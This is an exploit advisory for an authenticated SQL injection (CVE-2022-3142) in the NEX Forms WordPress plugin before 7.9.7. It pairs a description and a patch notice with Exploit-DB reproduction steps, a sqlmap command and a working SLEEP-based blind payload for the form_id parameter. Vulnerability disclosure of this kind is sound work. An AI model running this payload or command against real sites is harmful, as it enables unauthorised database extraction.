Vendor: NEX Forms
By: Elias Hohl
CVSS: 8.8 (HIGH)
Vulnerability Type: SQL Injection
CWE: CWE-89
Product Name: NEX Forms
Affected Versions: < 7.9.7
Patch Exists: Yes
Related CVE: CVE-2022-3142
CPE: 2.3:a:basixonline.net:nex_forms:7.9.7
Metasploit: none listed
Other Scripts: none listed
Platforms Tested: Ubuntu 20.04
Year: 2022

NEX-Forms WordPress plugin < 7.9.7 – Authenticated SQLi

Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin (versions before 7.9.7). An authenticated user who can reach the plugin's admin dashboard can exploit it by sending a malicious value in the "form_id" GET parameter of /wp-admin/admin.php?page=nex-forms-dashboard. The parameter reaches a MySQL query without proper sanitisation, so a time-based blind payload (MySQL SLEEP()) measurably delays the response; by making the delay conditional on a comparison, an attacker can extract arbitrary data from the database one yes/no answer per request.

Mitigation:

The vendor has released a fixed version. Users should update NEX-Forms to version 7.9.7 or later.

Exploit-DB raw data:

# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142

Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin

https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

1. Start a new WordPress instance using docker-compose.

2. Install the NEX Forms plugin.

3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.

4. Execute the following command: sqlmap -r nex-forms-req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:

Parameter: form_id (GET)
    Type: time-based blind
    Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)